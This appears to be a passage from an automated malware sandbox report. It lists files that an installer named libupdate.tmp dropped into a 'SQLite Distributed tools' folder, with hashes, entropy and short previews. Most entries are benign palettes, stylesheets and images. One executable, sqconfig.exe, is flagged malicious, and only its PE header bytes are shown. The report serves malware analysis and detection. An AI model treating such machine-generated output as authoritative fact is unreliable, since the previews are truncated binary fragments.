                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Coldfire" >. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00a8fc" alpha="255" />. <Color colorName="#00a4fc" alpha="255" />. <Color colorName="#00a0fc" alpha="255" />. <Color colorName="#009cfc" alpha="255" />. <Color colorName="#0098fc" alpha="255" />. <Color colorName="#0098fc" alpha="255" />. <Color colorName="#0094fc" alpha="255" />. <Color colorName="#0090fc" alpha="255" />. <Color colorName="#008cfc" alpha="255" />. <Color colorName="#0088fc" alpha="255" />. <Color colorName="#0084fc" alpha="255" />. <Color colorName="#0084fc" alpha="255" />. <Color colorName="#0080fc" alpha="255" />. <Color colorName="#007cfc" alpha="255" />. <Color colorName="#0078fc" alpha="255" />. <Color colorName="#0074fc" alpha="255" />. <Color colorName="#0070fc" alpha="255" />. <Color colorName="#0070fc" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-U32OR.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.462825236322438
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8GFFpU3JZqjKEJ3c1ZlboQSUEHHvtNbZixjZa:90iX+Hvncw
                                                                  MD5:98FFBC8069263E57999786204EBCBE86
                                                                  SHA1:B1BABEB3E7554716EFC305E40BC04DC4B9C4357B
                                                                  SHA-256:EC87139E70B4B4FDD070DF210FC671F2CC85395ACC8CD2177B3D05BC2E253BAA
                                                                  SHA-512:AFBB9D8707361DAAC0631C3039A00BB7F0827464C6BC30440D45D2FEBB4DDD003587330900D38A47A49EDA9C30C328246E9F4C4F9FA8DE8FA423EFDE05D60CC7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Greens" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000400" alpha="255" />. <Color colorName="#000c00" alpha="255" />. <Color colorName="#001000" alpha="255" />. <Color colorName="#001800" alpha="255" />. <Color colorName="#002000" alpha="255" />. <Color colorName="#002400" alpha="255" />. <Color colorName="#002c00" alpha="255" />. <Color colorName="#003000" alpha="255" />. <Color colorName="#003800" alpha="255" />. <Color colorName="#004000" alpha="255" />. <Color colorName="#004400" alpha="255" />. <Color colorName="#004c00" alpha="255" />. <Color colorName="#005000" alpha="255" />. <Color colorName="#005800" alpha="255" />. <Color colorName="#006000" alpha="255" />. <Color colorName="#006400" alpha="255" />. <Color colorName="#006c00" alpha="255" />. <Color colorName="#007400" alpha="255" />. <Color colorName="#007800" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-UGOI9.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):14542
                                                                  Entropy (8bit):4.457407380984402
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8wEyqE87qkKy3sSy3Kk7q8EEyqKKKKKKy1qtqwKKKKKKKKKKKKO8SWKKKKKKK4:c85+k+ze4s2LGB/zpALKAZ+F+oER8qYW
                                                                  MD5:D7935AB5CD93D1AC36639609740FE8C5
                                                                  SHA1:756D7CFDD3EBF4E6B6594DAB656804C9A949AB60
                                                                  SHA-256:240022708AADC9DE04A47D17D44E0648A5FA787909B397D26205913C8D586C5F
                                                                  SHA-512:EF7DFA55A53B5E3A7D2CAF5301176B02437B3B6D3CFFA5A608A91E70992D14670DC6092E0AB565D6704A4F001C231DCDA3B4D03074CE06C9B6450FDC2D5F050F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Visibone" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff6600" alpha="255" />. <Color colorName="#ff3300" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-VL14I.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):19362
                                                                  Entropy (8bit):4.547790104932671
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8+ZWGPlIbNYbOiZHt77jV8BUlqUYVNY7Qfdm0sUR50jtesnSjAEGaaFac02LqKe:9+ZW6IbNMZHtx8apucU1snGAEG/0zCk/
                                                                  MD5:301C15EBC9B8696007D0464CE84DF930
                                                                  SHA1:2463698396FAB36DBABB8D6F295AAD4630568431
                                                                  SHA-256:1252689CD56CF5DD1BF892A5FA89582AE488E5C83F8AC3EF6B2B2462162799E7
                                                                  SHA-512:AE4A21BF7D204A879F5097209D63BFC8CC1B12065DA3A0416406A658CEDC73274906FE2861715F9721FE95E14F7738887331942707E56ACD6F0C2188EE74C214
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Named Colors" >. <Color colorName="#fffafa" alpha="255" />. <Color colorName="#f8f8ff" alpha="255" />. <Color colorName="#f5f5f5" alpha="255" />. <Color colorName="#dcdcdc" alpha="255" />. <Color colorName="#fffaf0" alpha="255" />. <Color colorName="#fdf5e6" alpha="255" />. <Color colorName="#faf0e6" alpha="255" />. <Color colorName="#faebd7" alpha="255" />. <Color colorName="#ffefd5" alpha="255" />. <Color colorName="#ffebcd" alpha="255" />. <Color colorName="#ffe4c4" alpha="255" />. <Color colorName="#ffdab9" alpha="255" />. <Color colorName="#ffdead" alpha="255" />. <Color colorName="#ffe4b5" alpha="255" />. <Color colorName="#fff8dc" alpha="255" />. <Color colorName="#fffff0" alpha="255" />. <Color colorName="#fffacd" alpha="255" />. <Color colorName="#fff5ee" alpha="255" />. <Color colorName="#f0fff0" alpha="255" />. <Color colorName="#f5fffa" alpha="255" />. <Color colorName="#f0ffff" alpha="255" />. <Color co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\toonka.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):351
                                                                  Entropy (8bit):4.805216860983938
                                                                  Encrypted:false
                                                                  SSDEEP:6:TMVBd/kdS0v6GleDeEJhnFGleTwnFGle+TnFGlerQnFGleDIanFGleDeEJhnhRmb:TMHd8d/e9gesge+TgerQgebge9hqn
                                                                  MD5:9CC309775A5BB248D84E789BFAA2286D
                                                                  SHA1:57C380F3BB1B97AC850CF43C36ED72EFFFE050F5
                                                                  SHA-256:F2275D7160F636C23AD5B971A6AE6258EEB4F34055FB28FC33CFDBFD51C0EEB0
                                                                  SHA-512:0C868FA28CAB6DD76ABA352F3F1E38B1BC7A82115E2651825813206034F9637A8B3660FFF1FB732F60705D7D843AB483B2655E7505D245113C4A33C3BC434C11
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Toonka" >. <Color colorName="#f8952c" alpha="255" />. <Color colorName="#e68728" alpha="255" />. <Color colorName="#c27222" alpha="255" />. <Color colorName="#a25f1c" alpha="255" />. <Color colorName="#8d5318" alpha="255" />. <Color colorName="#f8952c" alpha="255" />.</Palette>..
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6177792
                                                                  Entropy (8bit):6.78864923284668
                                                                  Encrypted:false
                                                                  SSDEEP:98304:ofXC9cpYoBnBVABxYIw9G0f46+nSBRj6vnqrHS4gP85:LSptBViYIwa6a/nEH
                                                                  MD5:8B3831A85EAC83E63B4A0DEAA53B8404
                                                                  SHA1:BCFF5A8EF296A0A8A23BC2C05E0BB15240C5ECAA
                                                                  SHA-256:6042994FDFB49BF9342A79B33C902FD020246EEFB5AEC74F0A9E9AC8F35C1C97
                                                                  SHA-512:0C55C16EBBA5F176D401E40693BFBF9102364862075C67577793768BBB89D6CDA979E4C20484A1FCD42CA7CC339A1CB649FF1A3D4FD24FF12AF1D3F705CE7957
                                                                  Malicious:true
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........j.>...m...m...m.s.m...m.dpm...m.~.l...m.~.l...m.~.l...m.V.l...m.~.l...m.`.l...mvh.l...m...m...mvh.l...m.~.l...m.~rm...m...m...m.~.l...mRich...m'..H&.jH.mhI&.jHRich'.jH........PE..L...w.?a..................?..~......*W%.......?...@..................................X^...@...................................V.........Ta...................p........U.p...................@.U.....p.U.@.............?.(............................text.....?.......?................. ....rdata..`5....?..6....?.............@..@.data........ W..\....V.............@....rsrc...Ta.......b...XX.............@..@.reloc.......p........[.............@..B........................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\storyboard\is-2B5SG.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2150
                                                                  Entropy (8bit):4.537411078860039
                                                                  Encrypted:false
                                                                  SSDEEP:48:UzFxCioMThGnz8WRgXOl+FwgEz5HGBGjWwg:UxMMl0Bg+YF8dHRng
                                                                  MD5:36CFDB6B3BE5537658187F729A0A7884
                                                                  SHA1:05C714FA9FC2677C7174D7BF8C99D640C774BDEC
                                                                  SHA-256:9FE274FDBFF1DC65BCE4F485E81B84338D2753962528855405A21039A2943B17
                                                                  SHA-512:63686A3F25B44B19E6F23B6D1170B65DD600D899D15B141E941F6820C8860043A15CB51E9B97445FF2A813EA33AC7E1C69A2F75DA1B9D0CAF8A11D43DFE1B70D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: body {. color: #0e0e0e;. background: #ffffff;. font-family: arial, verdana, tahoma, times new roman, serif; . font-style: normal;. font-weight: normal;.}..#header {. width: 535px;. text-align: center;. background: #eeeeee;. border: 1px solid #bbbbbb;. color: black;. font-size: 14px;. padding: 5px 5px;. margin: 10px 10px;. margin-left: auto;. margin-right: auto;.}..#title {. text-align: center;. color: black;. font-weight: bold;. font-size: 15px;. margin-top: 2px;. margin-bottom: 2px;.}..#item {. text-align: justify;. border: 1px solid #cccccc;. color: black;. font-size: 14px;. margin-top: 2px;. margin-bottom: 2px;.}..#item-header {. text-align: justify;. color: black;. font-weight: bold;. font-size: 14px;. padding: 2px 5px;. margin-top: 2px;. margin-bottom: 2px;.}..#item-data {. text-align: justify;. background: #ffffff;. color: black;. font-size: 14px;. padding: 2px 5px
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\storyboard\is-A2QBG.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):137
                                                                  Entropy (8bit):4.2690317694781115
                                                                  Encrypted:false
                                                                  SSDEEP:3:tMuMfwFJXKOZleH1RKwFNF9dYIqRFcPNbviqkHFmGOCXLyrDwC:tVeweJH1X6Iqw6qkc8AsC
                                                                  MD5:D6A7F0C76D6A91E2FCA523A2BA0780EE
                                                                  SHA1:0BDB428A9EA15B9A23FC724BA113753D616FA407
                                                                  SHA-256:C71DEA3F8A35EA895D49951C6E18E5204E565E2FE726CCCCF0C64FA684FFC967
                                                                  SHA-512:DB05E5845D6F22E4E4ADB86EB44D42CCC0405BFE59506E31D02482338F7DEFC6AE3C9CE642324F25BA9749C11752309A039CA033BB47718E1FA67405DD641D5B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: @media print {. .printThisFull {. margin:auto;. page-break-after:always;. }.}..body {. background: #ffffff;.}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\storyboard\tupi.html.css (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2150
                                                                  Entropy (8bit):4.537411078860039
                                                                  Encrypted:false
                                                                  SSDEEP:48:UzFxCioMThGnz8WRgXOl+FwgEz5HGBGjWwg:UxMMl0Bg+YF8dHRng
                                                                  MD5:36CFDB6B3BE5537658187F729A0A7884
                                                                  SHA1:05C714FA9FC2677C7174D7BF8C99D640C774BDEC
                                                                  SHA-256:9FE274FDBFF1DC65BCE4F485E81B84338D2753962528855405A21039A2943B17
                                                                  SHA-512:63686A3F25B44B19E6F23B6D1170B65DD600D899D15B141E941F6820C8860043A15CB51E9B97445FF2A813EA33AC7E1C69A2F75DA1B9D0CAF8A11D43DFE1B70D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: body {. color: #0e0e0e;. background: #ffffff;. font-family: arial, verdana, tahoma, times new roman, serif; . font-style: normal;. font-weight: normal;.}..#header {. width: 535px;. text-align: center;. background: #eeeeee;. border: 1px solid #bbbbbb;. color: black;. font-size: 14px;. padding: 5px 5px;. margin: 10px 10px;. margin-left: auto;. margin-right: auto;.}..#title {. text-align: center;. color: black;. font-weight: bold;. font-size: 15px;. margin-top: 2px;. margin-bottom: 2px;.}..#item {. text-align: justify;. border: 1px solid #cccccc;. color: black;. font-size: 14px;. margin-top: 2px;. margin-bottom: 2px;.}..#item-header {. text-align: justify;. color: black;. font-weight: bold;. font-size: 14px;. padding: 2px 5px;. margin-top: 2px;. margin-bottom: 2px;.}..#item-data {. text-align: justify;. background: #ffffff;. color: black;. font-size: 14px;. padding: 2px 5px
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\storyboard\tupi.pdf.css (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):137
                                                                  Entropy (8bit):4.2690317694781115
                                                                  Encrypted:false
                                                                  SSDEEP:3:tMuMfwFJXKOZleH1RKwFNF9dYIqRFcPNbviqkHFmGOCXLyrDwC:tVeweJH1X6Iqw6qkc8AsC
                                                                  MD5:D6A7F0C76D6A91E2FCA523A2BA0780EE
                                                                  SHA1:0BDB428A9EA15B9A23FC724BA113753D616FA407
                                                                  SHA-256:C71DEA3F8A35EA895D49951C6E18E5204E565E2FE726CCCCF0C64FA684FFC967
                                                                  SHA-512:DB05E5845D6F22E4E4ADB86EB44D42CCC0405BFE59506E31D02482338F7DEFC6AE3C9CE642324F25BA9749C11752309A039CA033BB47718E1FA67405DD641D5B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: @media print {. .printThisFull {. margin:auto;. page-break-after:always;. }.}..body {. background: #ffffff;.}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\cosmo.css (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):164795
                                                                  Entropy (8bit):5.050230775792577
                                                                  Encrypted:false
                                                                  SSDEEP:1536:42pqL+QdGwz48+sEnpy0c2J4Pyaw7Pge9VmJz600I4b:42H9VmJz600I4b
                                                                  MD5:C36C66F79AEDD2688652D7FE7542192F
                                                                  SHA1:A9ABE0EA0D345DF5E2BAB84B549671EC209743EC
                                                                  SHA-256:060F9650EF9D5443703FB21ABBFBB2CB286E0108698F81F689CAABB72E460904
                                                                  SHA-512:683A47CEBE2CABC9CA3799EF0F0BD1FDB02A5DBA75C75FF483112C6EB35B31317E19449F6D22E993DAA929AAAB7C458C03F5334A96191B1F842FE1B6E4028D24
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ./*!.. * Bootswatch v5.0.2.. * Homepage: https://bootswatch.com.. * Copyright 2012-2021 Thomas Park.. * Licensed under MIT.. * Based on Bootstrap..*//*!.. * Bootstrap v5.0.2 (https://getbootstrap.com/).. * Copyright 2011-2021 The Bootstrap Authors.. * Copyright 2011-2021 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#2780e3;--bs-indigo:#6610f2;--bs-purple:#613d7c;--bs-pink:#e83e8c;--bs-red:#ff0039;--bs-orange:#f0ad4e;--bs-yellow:#ff7518;--bs-green:#3fb618;--bs-teal:#20c997;--bs-cyan:#9954bb;--bs-white:#fff;--bs-gray:#868e96;--bs-gray-dark:#373a3c;--bs-primary:#2780e3;--bs-secondary:#373a3c;--bs-success:#3fb618;--bs-info:#9954bb;--bs-warning:#ff7518;--bs-danger:#ff0039;--bs-light:#f8f9fa;--bs-dark:#373a3c;--bs-font-sans-serif:"Source Sans Pro",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--bs-font-monospace:SFMono-Regular,Menlo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\config\help.qss (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):106
                                                                  Entropy (8bit):4.52313953205426
                                                                  Encrypted:false
                                                                  SSDEEP:3:MXkHEGOCXLFSKPjUZ4GYF3IXAAlkHEGOCXLorOC:q8hRjUho3a80
                                                                  MD5:4A2DAD5F244335083CA6082DC5F5FC97
                                                                  SHA1:7C84E6F4AAE2CECB1263DF48A1DCF4F9E18C468B
                                                                  SHA-256:DD63521C525FDC22F4A8CDCCB460006DC2E8D74FA38E0C920F5CA08C0ED6FB24
                                                                  SHA-512:55CDDDE305CE3DAE57CBF5D929F54048781BDD0F45918DDB74D83B5B690191A0FA4613A6C889273DB18FA2BA3FB89340D73E6F72F2A2CD55175071781B593770
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: QWidget { . background-color: rgb(160,160,160) .} ..QTreeWidget { . background: rgb(200,200,200) .}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\config\is-J74S7.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):106
                                                                  Entropy (8bit):4.52313953205426
                                                                  Encrypted:false
                                                                  SSDEEP:3:MXkHEGOCXLFSKPjUZ4GYF3IXAAlkHEGOCXLorOC:q8hRjUho3a80
                                                                  MD5:4A2DAD5F244335083CA6082DC5F5FC97
                                                                  SHA1:7C84E6F4AAE2CECB1263DF48A1DCF4F9E18C468B
                                                                  SHA-256:DD63521C525FDC22F4A8CDCCB460006DC2E8D74FA38E0C920F5CA08C0ED6FB24
                                                                  SHA-512:55CDDDE305CE3DAE57CBF5D929F54048781BDD0F45918DDB74D83B5B690191A0FA4613A6C889273DB18FA2BA3FB89340D73E6F72F2A2CD55175071781B593770
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: QWidget { . background-color: rgb(160,160,160) .} ..QTreeWidget { . background: rgb(200,200,200) .}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\config\is-KGJ12.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):232
                                                                  Entropy (8bit):5.006382564831938
                                                                  Encrypted:false
                                                                  SSDEEP:6:q8hRjUho3Z/JKLOb2eOmY/FF6rjvFu8W5C8hR8v:q8Qho3ZoO1OmYOXvFu8WE82
                                                                  MD5:6D79FC749E75A78581A7E1ABACFD3AA2
                                                                  SHA1:698371461DED5A3FCEAA38A22828A46C1176BF94
                                                                  SHA-256:0CE13849155DC4F17A3C6AB44DD31FA0B012BB1085CCAEB2F71F1BC763ED2C37
                                                                  SHA-512:A37BFD34DAAA5809C427CCFBB44ACCB27E61A16E4910B8BE2A7A4AE12F53BA0E6D8B55959160B0C2F7622A8FC34DF990E327C00F1F13A4B453DAE897C90AE049
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: QWidget { . background-color: rgb(160,160,160) .} ..QLineEdit, QSpinBox, QDoubleSpinBox, QComboBox, QTableView, QListWidget, QTextEdit { . background: rgb(200,200,200) .}..QGraphicsView {. background-color: rgb(80,80,80).}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\config\ui.qss (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):232
                                                                  Entropy (8bit):5.006382564831938
                                                                  Encrypted:false
                                                                  SSDEEP:6:q8hRjUho3Z/JKLOb2eOmY/FF6rjvFu8W5C8hR8v:q8Qho3ZoO1OmYOXvFu8WE82
                                                                  MD5:6D79FC749E75A78581A7E1ABACFD3AA2
                                                                  SHA1:698371461DED5A3FCEAA38A22828A46C1176BF94
                                                                  SHA-256:0CE13849155DC4F17A3C6AB44DD31FA0B012BB1085CCAEB2F71F1BC763ED2C37
                                                                  SHA-512:A37BFD34DAAA5809C427CCFBB44ACCB27E61A16E4910B8BE2A7A4AE12F53BA0E6D8B55959160B0C2F7622A8FC34DF990E327C00F1F13A4B453DAE897C90AE049
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: QWidget { . background-color: rgb(160,160,160) .} ..QLineEdit, QSpinBox, QDoubleSpinBox, QComboBox, QTableView, QListWidget, QTextEdit { . background: rgb(200,200,200) .}..QGraphicsView {. background-color: rgb(80,80,80).}.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\circle.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):635
                                                                  Entropy (8bit):7.412938886787909
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7T+l9jCDdTC760CKAL2itUr814DRSwqhu9vaXJhwh3rzLHrhUDwT4pcXypDmz:E2+DdTg60vALN6Rou9vaXJypyDx+ypDI
                                                                  MD5:26EF5CCD4225951D472E2AC7D243E62E
                                                                  SHA1:C1161094E3F6672BD4114502C82F9E4C7AAA25BB
                                                                  SHA-256:4A58D71984B72866A4A136557ADB149807A4B912F10F097E28A2C0AF2568465A
                                                                  SHA-512:1AA5FBE94F039AE6F5215DC061B111DDB055AFB0A2387A5AEF9FB2A7421DAB5AE91D9A4EE4D647E2E528B38899D23BF80D6FC2F5E53099233AD828352B4F8524
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD......).......pHYs...0...0...'{....tIME..............IDAT8..=..Q...{...(A.f.A1.A...e.`#.......mS...R/.).b.".@..V...&3~-.9:o...6$...ns9..x...&..#...6B.]4....._.r..I}.^.!.%..... ..~.R....X,...@.|...d2+.4...j...>...J..p.J).r9.T... .H\.`:.f.......u]z.G....<99!..R.._<+..a....t]..1.N.....|...k....wrqqA.4M..NOO..xww..<.v..h4....0.R....|..u9.L...)..J...D.{.JJ)...r..R..p8`.Z..m...H.....F..)H".........J..$.....B!.F.?....l.~.....M.>k.F.8.....C.l6..,.......5.......j.....8....p8d...*....:.Nt<...x..b..'?H.u.4.i.;..../......O.o.. Ij.R.m<...i.LJ..Bl..XY.u.n.?......d.7\...J..+....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\cursors.svg (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:dropped
                                                                  Size (bytes):29942
                                                                  Entropy (8bit):4.907190632740671
                                                                  Encrypted:false
                                                                  SSDEEP:384:sXltlHGT47TJjpbYzcXFLr4gaj8kt26LxFRKtpppoYcKL1WTs3Rtxi:sX37pczcVHQ8kt26LRKDlcKL1WTs3zxi
                                                                  MD5:460A93892B06FA42822EB2E0FF9B09CF
                                                                  SHA1:4264F0C907E5400444435B62FEF1237EE461F9F5
                                                                  SHA-256:47D058F0E54A43E2D07B4A226404BA04BCE3F57CE8451CF5C9420D038881B6F5
                                                                  SHA-512:207471CD3CE328D0992A0488D24B1606A8E9B3D16B035D8CF0680909A11066398B0E4902682FD955D8A0E3B374F466C65487218E284B590B9FEDEA70C9B40B79
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="210mm". height="297mm". viewBox="0 0 744.09448819 1052.3622047". id="svg2". version="1.1". inkscape:version="0.91 r13725". sodipodi:docname="cursors.svg">. <defs. id="defs4" />. <sodipodi:namedview. id="base". pagecolor="#ffffff". bordercolor="#666666". borderopacity="1.0". inkscape:pageopacity="0.0". inkscape:pageshadow="2". inkscape:zoom="0.35355339". inkscape:cx="917.88094". inkscape:cy="592.10563". inkscape:document-units="px". inkscap
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\eyedropper.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):472
                                                                  Entropy (8bit):7.304517452099432
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7jojRZw5deasPaSRWdBTC2YNOm1GAnIsH3A7Zg5DY3:WoVZuvoudxQNOqrXA7Zg5Dy
                                                                  MD5:DA0AA6853B8C4506458C03EE2ED89D74
                                                                  SHA1:0A02713202E4CDC18231A58BBEA00B7FF2A06D69
                                                                  SHA-256:1C4E648338CC786F3C2703758A338275FF732D8D075B53FCFD3FE8A6BCDA1DB7
                                                                  SHA-512:F915A85F3670BD903758E35E1B2394BAC281CA93B07E78D1BD3F48C9C991563C44426CA9E6D3A98BF6304E41F4B8298D053F2A15C1437E53BA0C31BE083DBBAB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD..............pHYs...0...0...'{....tIME.....5........eIDAT8.u.K.Q...._.C.5.%u.Pp.!....q........D...E?(..Eph.k....K.. Jq]..t.......}^..<.....4....U.....*.0.!..WQ.u...m..>...sW.F......<.0.R.2.>...4:....o....\.'|N.<w.x..&c.x..p+.y,&n.;&R;R...ql...Bq._.8N...E.6.X..:M..N....f.).F.z:.].9...8....b....`g.'X.....:..........?./....c....b.............4....f.x....n_..o.U|.Vr....a..=....l....*G.Q.I.q>...O....#....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\ink.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 18, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):530
                                                                  Entropy (8bit):7.32195204505726
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7oY0Z6qdwLNEmQpnDpIrPL+g+x8OIMdLLZ2hNjuLd5d:3Y0UMb7lILKebMuyLN
                                                                  MD5:DEFFEB127766CD27629FA49DA6224363
                                                                  SHA1:F1029F992B282CF4A98E3D2EEAA6B1C8875C76C4
                                                                  SHA-256:ADD8FB99FDF4BEF7D7B1E3E2E75540DC78725278CCE437ED0491EBC6A2F41F38
                                                                  SHA-512:831CEF0D2D2E8EC5850E23D22294BB6B010348DE0B325BA4D1B60793FC4D3B3B2A8B46E43CF72E4D6A7800E29F7F6DDB769822C8F02D50F3FE5DD745623FA16F
                                                                  Malicious:false
                                                                  Reputation:unknown
